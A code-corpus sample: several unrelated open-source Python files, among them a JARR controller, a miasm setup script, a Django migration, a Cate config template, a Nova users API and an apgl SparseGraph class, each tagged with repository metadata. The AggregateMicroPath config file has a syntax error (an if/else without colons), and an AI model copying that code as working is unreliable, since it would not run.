try:
asyncore.loop(timeout=0.1)
except:
proxy.shutdown(2)
proxy.close()
raise
| foligny/browsershots-psycopg2 | throxy/throxy.py | Python | gpl-3.0 | 19,293 | 0.001451 |
import logging
from datetime import timezone
import dateutil.parser
from sqlalchemy import and_, or_
from werkzeug.exceptions import Forbidden, NotFound, Unauthorized
from jarr.bootstrap import Base, session
logger = logging.getLogger(__name__)
def cast_to_utc(dt_obj):
dt_obj = dateutil.parser.parse(dt_obj)
if not dt_obj.tzinfo:
return dt_obj.replace(tzinfo=timezone.utc)
return dt_obj
class AbstractController:
_db_cls = Base # reference to the database class, to redefine in child cls
_user_id_key = 'user_id'
def __init__(self, user_id=None, ignore_context=False):
"""
Base methods for controllers accross JARR.
User id is a right management mechanism that should be used to
filter objects in database on their denormalized "user_id" field
(or "id" field for users).
Should no user_id be provided, the Controller won't apply any filter
allowing for a kind of "super user" mode.
"""
if self._db_cls is None:
raise NotImplementedError("%r _db_cls isn't overridden" % self)
try:
self.user_id = int(user_id)
except TypeError:
self.user_id = user_id
@staticmethod
def _to_comparison(key, model):
"""Extract from the key the method used by sqla for comparison."""
if '__' not in key:
return getattr(model, key).__eq__
attr, ope = key.rsplit('__', 1)
if ope == 'nin':
return getattr(model, attr).notin_
if ope == 'in':
return getattr(model, attr).in_
if ope not in {'like', 'ilike'}:
ope = '__%s__' % ope
return getattr(getattr(model, attr), ope)
@classmethod
def _to_filters(cls, **filters):
"""
Will translate filters to sqlalchemy filter.
This method will also apply user_id restriction if available.
each parameters of the function is treated as an equality unless the
name of the parameter ends with either "__gt", "__lt", "__ge", "__le",
"__ne", "__in", "__like" or "__ilike".
"""
db_filters = set()
for key, value in filters.items():
if key == '__or__':
db_filters.add(or_(*[and_(*cls._to_filters(**sub_filter))
for sub_filter in value]))
elif key == '__and__':
for sub_filter in value:
for k, v in sub_filter.items():
db_filters.add(cls._to_comparison(k, cls._db_cls)(v))
else:
db_filters.add(cls._to_comparison(key, cls._db_cls)(value))
return db_filters
def _get(self, **filters):
"""
Abstract get.
Will add the current user id if that one is not none (in which case
the decision has been made in the code that the query shouldn't be user
dependant) and the user is not an admin and the filters doesn't already
contains a filter for that user.
"""
if self._user_id_key is not None and self.user_id \
and filters.get(self._user_id_key) != self.user_id:
filters[self._user_id_key] = self.user_id
return session.query(self._db_cls).filter(*self._to_filters(**filters))
def get(self, **filters):
"""Will return one single objects corresponding to filters"""
obj = self._get(**filters).first()
if obj and not self._has_right_on(obj):
raise Forbidden('No authorized to access %r (%r)' % (
self._db_cls.__class__.__name__, filters))
if not obj:
raise NotFound('No %r (%r)' % (self._db_cls.__class__.__name__,
filters))
return obj
def create(self, **attrs):
if not attrs:
raise ValueError("attributes to update must not be empty")
if self._user_id_key is not None and self._user_id_key not in attrs:
attrs[self._user_id_key] = self.user_id
if not (self._user_id_key is None or self._user_id_key in attrs
or self.user_id is None):
raise Unauthorized("You must provide user_id one way or another")
obj = self._db_cls(**attrs)
session.add(obj)
session.flush()
session.commit()
return obj
def read(self, **filters):
return self._get(**filters)
def update(self, filters, attrs, return_objs=False, commit=True):
if not attrs:
logger.error("nothing to update, doing nothing")
result, commit = {}, False
else:
result = self._get(**filters).update(attrs,
synchronize_session=False)
if commit:
session.flush()
session.commit()
if return_objs:
return self._get(**filters)
return result
def delete(self, obj_id, commit=True):
obj = self.get(id=obj_id)
session.delete(obj)
if commit:
session.flush()
session.commit()
return obj
def _has_right_on(self, obj):
# user_id == None is like being admin
if self._user_id_key is None:
return True
return self.user_id is None \
or getattr(obj, self._user_id_key, None) == self.user_id
def assert_right_ok(self, obj_id):
if not self.user_id:
raise ValueError("%r user_id can't be None" % self)
rows = self.__class__().read(id=obj_id).with_entities(
getattr(self._db_cls, self._user_id_key)).first()
if not rows:
raise NotFound()
if not rows[0] == self.user_id:
raise Forbidden()
| jaesivsm/pyAggr3g470r | jarr/controllers/abstract.py | Python | agpl-3.0 | 5,796 | 0.000173 |
#! /usr/bin/env python
from distutils.core import setup, Extension
from distutils.util import get_platform
import shutil
import os, sys
def buil_all():
packages=['miasm2',
'miasm2/arch',
'miasm2/arch/x86',
'miasm2/arch/arm',
'miasm2/arch/aarch64',
'miasm2/arch/msp430',
'miasm2/arch/sh4',
'miasm2/arch/mips32',
'miasm2/core',
'miasm2/expression',
'miasm2/ir',
'miasm2/ir/translators',
'miasm2/analysis',
'miasm2/os_dep',
'miasm2/jitter',
'miasm2/jitter/arch',
'miasm2/jitter/loader',
]
ext_modules_no_tcc = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
]
ext_modules_all = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jittcc",
["miasm2/jitter/Jittcc.c"],
libraries=["tcc"])
]
print 'building'
build_ok = False
for name, ext_modules in [('all', ext_modules_all),
('notcc', ext_modules_no_tcc)]:
print 'build with', repr(name)
try:
s = setup(
name = 'Miasm',
version = '2.0',
packages = packages,
package_data = {'miasm2':['jitter/*.h',
'jitter/arch/*.h',]},
ext_modules = ext_modules,
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
except SystemExit, e:
print repr(e)
continue
build_ok = True
break
if not build_ok:
raise ValueError('Unable to build Miasm!')
print 'build', name
if name == 'notcc':
print
print "*"*80
print "Warning: TCC is not properly installed,"
print "Miasm will be installed without TCC Jitter"
print "Etheir install TCC or use LLVM jitter"
print "*"*80
print
# we copy libraries from build dir to current miasm directory
build_base = None
if 'build' in s.command_options:
if 'build_base' in s.command_options['build']:
build_base = s.command_options['build']['build_base']
if build_base is None:
build_base = "build"
plat_specifier = ".%s-%s" % (get_platform(), sys.version[0:3])
build_base = os.path.join('build','lib' + plat_specifier)
print build_base
def buil_no_tcc():
setup(
name = 'Miasm',
version = '2.0',
packages=['miasm2', 'miasm2/tools',
'miasm2/expression', 'miasm2/graph', 'miasm2/arch',
'miasm2/core', 'miasm2/tools/emul_lib' ],
package_data = {'miasm2':['tools/emul_lib/*.h']},
# data_files = [('toto', ['miasm2/tools/emul_lib/queue.h'])],
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
def try_build():
buil_all()
"""
try:
buil_all()
return
except:
print "WARNING cannot build with libtcc!, trying without it"
print "Miasm will not be able to emulate code"
buil_no_tcc()
"""
try_build()
| chubbymaggie/miasm | setup.py | Python | gpl-2.0 | 6,252 | 0.006718 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ictus', '0028_auto_20161212_1316'),
]
operations = [
migrations.AlterField(
model_name='basal',
name='alcohol',
field=models.IntegerField(null=True, choices=[('00', 'No'), ('01', 'A diario'), ('02', 'Ocasionalmente'), ('03', 'Exhabito enólico')], blank=True, verbose_name='Alcohol'),
),
migrations.AlterField(
model_name='basal',
name='tabaquismo',
field=models.IntegerField(null=True, choices=[('00', 'No fumador'), ('01', 'Exfumador'), ('02', 'Fumador pasivo'), ('03', 'Fumador actual'), ('04', 'Desconocido')], blank=True, verbose_name='Tabaco'),
),
]
| NavarraBiomed/seguimientoPacientes | ictus/migrations/0029_auto_20161212_1316.py | Python | gpl-2.0 | 852 | 0.00235 |
from typing import List
class Message(object):
class Origin(object):
servername: str
nickname: str
username: str
hostname: str
command: str
origin: Origin
params: List[str]
| LastAvenger/labots | labots/common/message.py | Python | gpl-3.0 | 223 | 0.004484 |
# -*- coding:utf-8 -*-
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
volume = test_lib.lib_get_specific_stub('e2e_mini/volume', 'volume')
volume_ops = None
vm_ops = None
volume_name = 'volume-' + volume.get_time_postfix()
backup_name = 'backup-' + volume.get_time_postfix()
def test():
global volume_ops
volume_ops = volume.VOLUME()
vm = test_lib.lib_get_specific_stub(suite_name='e2e_mini/vm', specific_name='vm')
vm_ops = vm.VM(uri=volume_ops.uri, initialized=True)
vm_ops.create_vm()
volume_ops.create_volume(volume_name)
volume_ops.volume_attach_to_vm(vm_ops.vm_name)
volume_ops.create_backup(volume_name, 'volume', backup_name)
vm_ops.vm_ops(vm_ops.vm_name, action='stop')
volume_ops.restore_backup(volume_name, 'volume', backup_name)
volume_ops.delete_backup(volume_name, 'volume', backup_name)
volume_ops.check_browser_console_log()
test_util.test_pass('Test Volume Create, Restore and Delete Backups Successful')
def env_recover():
global volume_ops
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
#Will be called only if exception happens in test().
def error_cleanup():
global volume_ops
try:
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
except:
pass
| zstackio/zstack-woodpecker | integrationtest/vm/e2e_mini/volume/test_volume_backup.py | Python | apache-2.0 | 1,389 | 0.00432 |
# Copyright 2016 Sotera Defense Solutions Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import six
if six.PY2
from ConfigParser import SafeConfigParser
else
from configparser import SafeConfigParser
class AggregateMicroPathConfig:
config_file = ""
table_name = ""
table_schema_id = ""
table_schema_dt = ""
table_schema_lat = ""
table_schema_lon = ""
time_filter = 0
distance_filter = 0
tripLat1 = 0
tripLon1 = 0
tripLat2 = 0
tripLon2 = 0
tripname = ""
resolutionLat = 0
resolutionLon = 0
tripLatMin = 0
tripLatMax = 0
tripLonMin = 0
tripLonMax = 0
triplineBlankets = []
def __init__(self, config, basePath = "./"):
configParser = SafeConfigParser()
configParser.read(basePath + config)
self.config_file = config
self.database_name = configParser.get("AggregateMicroPath", "database_name")
self.table_name = configParser.get("AggregateMicroPath", "table_name")
self.table_schema_id = configParser.get("AggregateMicroPath", "table_schema_id")
self.table_schema_dt = configParser.get("AggregateMicroPath", "table_schema_dt")
self.table_schema_lat = configParser.get("AggregateMicroPath", "table_schema_lat")
self.table_schema_lon = configParser.get("AggregateMicroPath", "table_schema_lon")
self.time_filter = long(configParser.get("AggregateMicroPath", "time_filter"))
self.distance_filter = long(configParser.get("AggregateMicroPath", "distance_filter"))
self.tripLat1 = float(configParser.get("AggregateMicroPath", "lower_left_lat"))
self.tripLon1 = float(configParser.get("AggregateMicroPath", "lower_left_lon"))
self.tripLat2 = float(configParser.get("AggregateMicroPath", "upper_right_lat"))
self.tripLon2 = float(configParser.get("AggregateMicroPath", "upper_right_lon"))
self.tripname = configParser.get("AggregateMicroPath", "trip_name")
self.resolutionLat = float(configParser.get("AggregateMicroPath", "resolution_lat"))
self.resolutionLon = float(configParser.get("AggregateMicroPath", "resolution_lon"))
self.tripLatMin = int(math.floor(self.tripLat1/self.resolutionLat))#6
self.tripLatMax = int(math.ceil(self.tripLat2/self.resolutionLat)) #7
self.tripLonMin = int(math.floor(self.tripLon1/self.resolutionLon)) #8
self.tripLonMax = int(math.ceil(self.tripLon2/self.resolutionLon)) #9
self.triplineBlankets.append([self.tripLat1,self.tripLon1,self.tripLat2,self.tripLon2,self.tripname,self.resolutionLat,self.resolutionLon,self.tripLatMin,self.tripLatMax,self.tripLonMin,self.tripLonMax])
self.temporal_split = configParser.get("AggregateMicroPath", "temporal_split")
| Sotera/aggregate-micro-paths | hive-streaming/conf/config.py | Python | apache-2.0 | 3,321 | 0.016561 |
"""
WSGI config for alex project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "alex.settings")
application = get_wsgi_application()
| xualex/DjangoTutorial | alex/alex/wsgi.py | Python | mit | 386 | 0 |
################################################################################
# This is a Cate configuration file. #
# #
# If this file is "~/.cate/conf.py", it is the active Cate configuration. #
# #
# If this file is named "conf.py.template" you can rename it and move #
# it "~/.cate/conf.py" to make it the active Cate configuration file. #
# #
# As this is a regular Python script, you may use any Python code to compute #
# the settings provided here. #
# #
# Please find the configuration template for a given Cate VERSION at #
# https://github.com/CCI-Tools/cate/blob/vVERSION/cate/conf/template.py #
# For example: #
# https://github.com/CCI-Tools/cate/blob/v2.0.0.dev4/cate/conf/template.py #
################################################################################
# 'data_stores_path' is denotes a directory where Cate stores information about data stores and also saves
# local data files synchronized with their remote versions.
# Use the tilde '~' (also on Windows) within the path to point to your home directory.
#
# data_stores_path = '~/.cate/data_stores'
# 'dataset_persistence_format' names the data format to be used when persisting datasets in the workspace.
# Possible values are 'netcdf4' or 'zarr'.
# dataset_persistence_format = 'netcdf4'
# If 'use_workspace_imagery_cache' is True, Cate will maintain a per-workspace
# cache for imagery generated from dataset variables. Such cache can accelerate
# image display, however at the cost of disk space.
#
# use_workspace_imagery_cache = False
# Default prefix for names generated for new workspace resources originating from opening data sources
# or executing workflow steps.
# This prefix is used only if no specific prefix is defined for a given operation.
# default_res_pattern = 'res_{index}'
# User defined HTTP proxy settings, will replace one stored in System environment variable 'http_proxy'
# Accepted proxy details formats:
# 'http://user:password@host:port'
# 'https://user:password@host:port'
# 'http://host:port'
# 'https://host:port'
# http_proxy =
# Include/exclude data sources (currently effective in Cate Desktop GUI only, not used by API, CLI).
#
# If 'included_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be included. By default, or if 'included_data_sources' is None, all data sources are included.
# If 'excluded_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be excluded. By default, or if 'excluded_data_sources' is None, no data sources are excluded.
# If both 'included_data_sources' and 'excluded_data_sources' are lists, we first include data sources using
# 'included_data_sources' then remove entries that match any result from applying 'excluded_data_sources'.
#
# We put wildcards here that match all data sources that are known to work in GUI
# included_ds_ids = []
# We put wildcards here that match all data sources that are known NOT to work in GUI
excluded_ds_ids = [
# Exclude datasets that usually take too long to download or cannot be easily aggregated
# e.g.
# 'esacci.*.day.*',
# 'esacci.*.satellite-orbit-frequency.*',
# 'esacci.LC.*',
]
# Configure names of variables that will be initially selected once a new
# dataset resource is opened in the GUI.
# default_variables = {
# 'cfc', # Cloud CCI
# 'lccs_class', # Land Cover CCI
# 'analysed_sst', # Sea Surface Temperature CCI
# }
# Configure / overwrite default variable display settings as used in various plot_<type>() operations
# and in the Cate Desktop GUI.
# Each entry maps a variable name to a dictionary with the following entries:
# color_map - name of a color map taken from from https://matplotlib.org/examples/color/colormaps_reference.html
# display_min - minimum variable value that corresponds to the lower end of the color map
# display_max - maximum variable value that corresponds to the upper end of the color map
#
# variable_display_settings = {
# 'my_var': dict(color_map='viridis', display_min=0.1, display_max=0.8),
# }
# Default color map to be used for any variable not configured in 'variable_display_settings'
# 'default_color_map' must be the name of a color map taken from from
# https://matplotlib.org/examples/color/colormaps_reference.html
# default_color_map = 'jet'
default_color_map = 'inferno'
# Data Store Configurations
# Load from here the configurations of the data stores that will eventually be loaded into cate
store_configs = {
"local": {
"store_id": "directory",
"store_params": {
"base_dir": "",
}
},
"cci-store": {
"store_id": "cciodp"
},
"cds-store": {
"store_id": "cds"
}
}
| CCI-Tools/cate-core | cate/conf/template.py | Python | mit | 5,327 | 0.007509 |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova import exception
from nova import flags
from nova import log as logging
from nova.api.openstack import common
from nova.api.openstack import faults
from nova.auth import manager
FLAGS = flags.FLAGS
LOG = logging.getLogger('nova.api.openstack')
def _translate_keys(user):
return dict(id=user.id,
name=user.name,
access=user.access,
secret=user.secret,
admin=user.admin)
class Controller(common.OpenstackController):
_serialization_metadata = {
'application/xml': {
"attributes": {
"user": ["id", "name", "access", "secret", "admin"]}}}
def __init__(self):
self.manager = manager.AuthManager()
def _check_admin(self, context):
"""We cannot depend on the db layer to check for admin access
for the auth manager, so we do it here"""
if not context.is_admin:
raise exception.AdminRequired()
def index(self, req):
"""Return all users in brief"""
users = self.manager.get_users()
users = common.limited(users, req)
users = [_translate_keys(user) for user in users]
return dict(users=users)
def detail(self, req):
"""Return all users in detail"""
return self.index(req)
def show(self, req, id):
"""Return data about the given user id"""
#NOTE(justinsb): The drivers are a little inconsistent in how they
# deal with "NotFound" - some throw, some return None.
try:
user = self.manager.get_user(id)
except exception.NotFound:
user = None
if user is None:
raise faults.Fault(exc.HTTPNotFound())
return dict(user=_translate_keys(user))
def delete(self, req, id):
self._check_admin(req.environ['nova.context'])
self.manager.delete_user(id)
return {}
def create(self, req):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin') in ('T', 'True', True)
name = env['user'].get('name')
access = env['user'].get('access')
secret = env['user'].get('secret')
user = self.manager.create_user(name, access, secret, is_admin)
return dict(user=_translate_keys(user))
def update(self, req, id):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin')
if is_admin is not None:
is_admin = is_admin in ('T', 'True', True)
access = env['user'].get('access')
secret = env['user'].get('secret')
self.manager.modify_user(id, access, secret, is_admin)
return dict(user=_translate_keys(self.manager.get_user(id)))
| superstack/nova | nova/api/openstack/users.py | Python | apache-2.0 | 3,531 | 0.000283 |
from apgl.graph.AbstractMatrixGraph import AbstractMatrixGraph
from apgl.graph.AbstractVertexList import AbstractVertexList
from apgl.graph.GeneralVertexList import GeneralVertexList
from apgl.graph.VertexList import VertexList
from apgl.util.Util import Util
from apgl.util.SparseUtils import SparseUtils
from apgl.util.Parameter import Parameter
import scipy.sparse as sparse
import scipy.io
import numpy
class SparseGraph(AbstractMatrixGraph):
'''
Represents a graph, which can be directed or undirected, and has weights
on the edges. Memory usage is efficient for sparse graphs. The list of vertices
is immutable (see VertexList), however edges can be added or removed. Only
non-zero edges can be added. Uses scipy.sparse for the underlying matrix
representation.
'''
def __init__(self, vertices, undirected=True, W=None, dtype=numpy.float, frmt="csr"):
"""
Create a SparseGraph with a given AbstractVertexList or number of
vertices, and specify whether it is directed. One can optionally pass
in a sparse matrix W which is used as the weight matrix of the
graph. Different kinds of sparse matrix can impact the speed of various
operations. The currently supported sparse matrix types are: lil_matrix,
csr_matrix, csc_matrix and dok_matrix. The default sparse matrix is
csr_matrix.
:param vertices: the initial set of vertices as a AbstractVertexList object, or an int to specify the number of vertices in which case vertices are stored in a GeneralVertexList.
:param undirected: a boolean variable to indicate if the graph is undirected.
:type undirected: :class:`boolean`
:param W: a square sparse matrix of the same size as the number of vertices, or None to create the default one.
:param dtype: the data type of the sparse matrix if W is not specified.
:param frmt: the format of the sparse matrix: lil, csr or csc if W is not specified
"""
Parameter.checkBoolean(undirected)
if isinstance(vertices, AbstractVertexList):
self.vList = vertices
elif isinstance(vertices, int):
self.vList = GeneralVertexList(vertices)
else:
raise ValueError("Invalid vList parameter: " + str(vertices))
if W != None and not (sparse.issparse(W) and W.shape == (self.vList.getNumVertices(), self.vList.getNumVertices())):
raise ValueError("Input argument W must be None or sparse matrix of size " + str(self.vList.getNumVertices()) )
self.undirected = undirected
if frmt=="lil":
matrix = sparse.lil_matrix
elif frmt=="csr":
matrix = sparse.csr_matrix
elif frmt=="csc":
matrix = sparse.csc_matrix
else:
raise ValueError("Invalid sparse matrix format: " + frmt)
#Terrible hack alert: can't create a zero size sparse matrix, so we settle
#for one of size 1. Better is to create a new class.
if self.vList.getNumVertices() == 0 and W == None:
self.W = matrix((1, 1), dtype=dtype)
elif W == None:
self.W = matrix((self.vList.getNumVertices(), self.vList.getNumVertices()), dtype=dtype)
else:
self.W = W
#The next line is for error checking mainly
self.setWeightMatrix(W)
def neighbours(self, vertexIndex):
"""
Return an array of the indices of neighbours. In the case of a directed
graph it is an array of those vertices connected by an edge from the current
one.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all neigbours of the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
#neighbours = self.W[vertexIndex, :].nonzero()[1]
neighbours = self.W.getrow(vertexIndex).nonzero()[1]
#neighbours = numpy.nonzero(self.W.getrow(vertexIndex).toarray())[1]
return neighbours
def neighbourOf(self, vertexIndex):
"""
Return an array of the indices of vertices than have an edge going to the input
vertex.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all vertices with an edge towards the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
nonZeroInds = self.W[:, vertexIndex].nonzero()
neighbours = nonZeroInds[0]
return neighbours
def getNumEdges(self):
"""
:returns: the total number of edges in this graph.
"""
if self.getNumVertices()==0:
return 0
#Note that self.W.getnnz() doesn't seem to work correctly
if self.undirected == True:
return (self.W.nonzero()[0].shape[0] + numpy.sum(SparseUtils.diag(self.W) != 0))/2
else:
return self.W.nonzero()[0].shape[0]
def getNumDirEdges(self):
"""
:returns: the number of edges, taking this graph as a directed graph.
"""
return self.W.nonzero()[0].shape[0]
def outDegreeSequence(self):
"""
:returns: a vector of the (out)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(1), dtype=numpy.int32).ravel()
return degrees
def inDegreeSequence(self):
"""
:returns: a vector of the (in)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(0), dtype=numpy.int32).ravel()
return degrees
def subgraph(self, vertexIndices):
"""
Pass in a list or set of vertexIndices and returns the subgraph containing
those vertices only, and edges between them. The subgraph indices correspond
to the sorted input indices.
:param vertexIndices: the indices of the subgraph vertices.
:type vertexIndices: :class:`list`
:returns: A new SparseGraph containing only vertices and edges from vertexIndices
"""
Parameter.checkList(vertexIndices, Parameter.checkIndex, (0, self.getNumVertices()))
vertexIndices = numpy.unique(numpy.array(vertexIndices)).tolist()
vList = self.vList.subList(vertexIndices)
subGraph = SparseGraph(vList, self.undirected)
if len(vertexIndices) != 0:
subGraph.W = self.W[vertexIndices, :][:, vertexIndices]
return subGraph
def getWeightMatrix(self):
"""
Return the weight matrix in dense format. Warning: should not be used
unless sufficient memory is available to store the dense matrix.
:returns: A numpy.ndarray weight matrix.
"""
if self.getVertexList().getNumVertices() != 0:
return self.W.toarray()
else:
return numpy.zeros((0, 0))
def getSparseWeightMatrix(self):
"""
Returns the original sparse weight matrix.
:returns: A scipy.sparse weight matrix.
"""
return self.W
def add(self, graph):
"""
Add the edge weights of the input graph to the current one. Results in a
union of the edges.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with same vertex list and addition of edge weights
"""
Parameter.checkClass(graph, SparseGraph)
if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
raise ValueError("Both graphs must be either undirected or directed")
#The ideal way is to add both weight matrices together, but this results in a csr
#We'll just do this manually
nonZeros = numpy.nonzero(graph.W)
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = self.W.copy()
for i in range(len(nonZeros[0])):
ind1 = nonZeros[0][i]
ind2 = nonZeros[1][i]
newGraph.W[ind1, ind2] = self.W[ind1, ind2] + graph.W[ind1, ind2]
return newGraph
def multiply(self, graph):
"""
Multiply the edge weights of the input graph to the current one. Results in an
intersection of the edges.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with edge weights which are multiples of the current and graph
"""
Parameter.checkClass(graph, SparseGraph)
if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
raise ValueError("Both graphs must be either undirected or directed")
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = self.W.multiply(graph.W)
return newGraph
def copy(self):
"""
Returns a copy of this object, which also has a copy of the AbstractVertexList.
"""
newGraph = SparseGraph(self.vList.copy(), self.undirected)
newGraph.W = self.W.copy()
return newGraph
def complement(self):
"""
Returns a graph with identical vertices (same reference) to the current
one, but with the complement of the set of edges. Edges that do not exist
have weight 1. This makes a sparse graph dense.
:returns: A new graph with edges complmenting the current one.
"""
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = self.weightMatrixType()(numpy.ones((self.vList.getNumVertices(), self.vList.getNumVertices())))
A = self.nativeAdjacencyMatrix()
newGraph.W = newGraph.W - A
return newGraph
def setWeightMatrix(self, W):
"""
Set the weight matrix of this graph. Requires as input an ndarray or
a scipy sparse matrix with the same dimensions as the current weight
matrix. Edges are represented by non-zero edges.
:param W: The weight matrix to use.
:type W: :class:`ndarray` or :class:`scipy.sparse` matrix
"""
#Parameter.checkClass(W, numpy.ndarray)
if W.shape != (self.vList.getNumVertices(), self.vList.getNumVertices()):
raise ValueError("Weight matrix has wrong shape : " + str(W.shape))
if self.undirected and type(W) == numpy.ndarray and (W != W.T).any():
raise ValueError("Weight matrix of undirected graph must be symmetric")
if self.undirected and scipy.sparse.issparse(W) and not SparseUtils.equals(W, W.T):
raise ValueError("Weight matrix of undirected graph must be symmetric")
self.W = self.weightMatrixType()(W)
def setWeightMatrixSparse(self, W):
"""
Set the weight matrix of this graph. Requires as input a scipy sparse matrix with the
same dimensions as the current weight matrix. Edges are represented by
non-zero edges.
:param W: The weight matrix to use.
"""
if not sparse.issparse(W):
raise ValueError("Input must be a sparse matrix, not " + str(type(W)))
if W.shape != (self.vList.getNumVertices(), self.vList.getNumVertices()):
raise ValueError("Weight matrix has wrong shape : " + str(W.shape))
if self.undirected and (W - W.transpose()).nonzero()[0].shape[0]:
raise ValueError("Weight matrix of undirected graph must be symmetric")
self.W = W
def weightMatrixType(self):
"""
:returns: the type of the sparse matrix used to store edge weights.
"""
return type(self.W)
def removeEdge(self, vertexIndex1, vertexIndex2):
"""
Remove an edge between two vertices.
:param vertexIndex1: The index of the first vertex.
:type vertexIndex1: :class:`int`
:param vertexIndex2: The index of the second vertex.
:type vertexIndex2: :class:`int`
"""
super(SparseGraph, self).removeEdge(vertexIndex1, vertexIndex2)
self.W.eliminate_zeros()
def nativeAdjacencyMatrix(self):
"""
:returns: the adjacency matrix in the native sparse format.
"""
try:
self.W.eliminate_zeros()
except AttributeError:
pass
A = self.W/self.W
return A
def setDiff(self, graph):
"""
Find the edges in the current graph which are not present in the input
graph.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with edges from the current graph and not in the input graph.
"""
Parameter.checkClass(graph, SparseGraph)
if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
raise ValueError("Both graphs must be either undirected or directed")
A1 = self.nativeAdjacencyMatrix()
A2 = graph.nativeAdjacencyMatrix()
A1 = A1 - A2
A = (A1 + A1.multiply(A1))/2
A.prune()
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = A
return newGraph
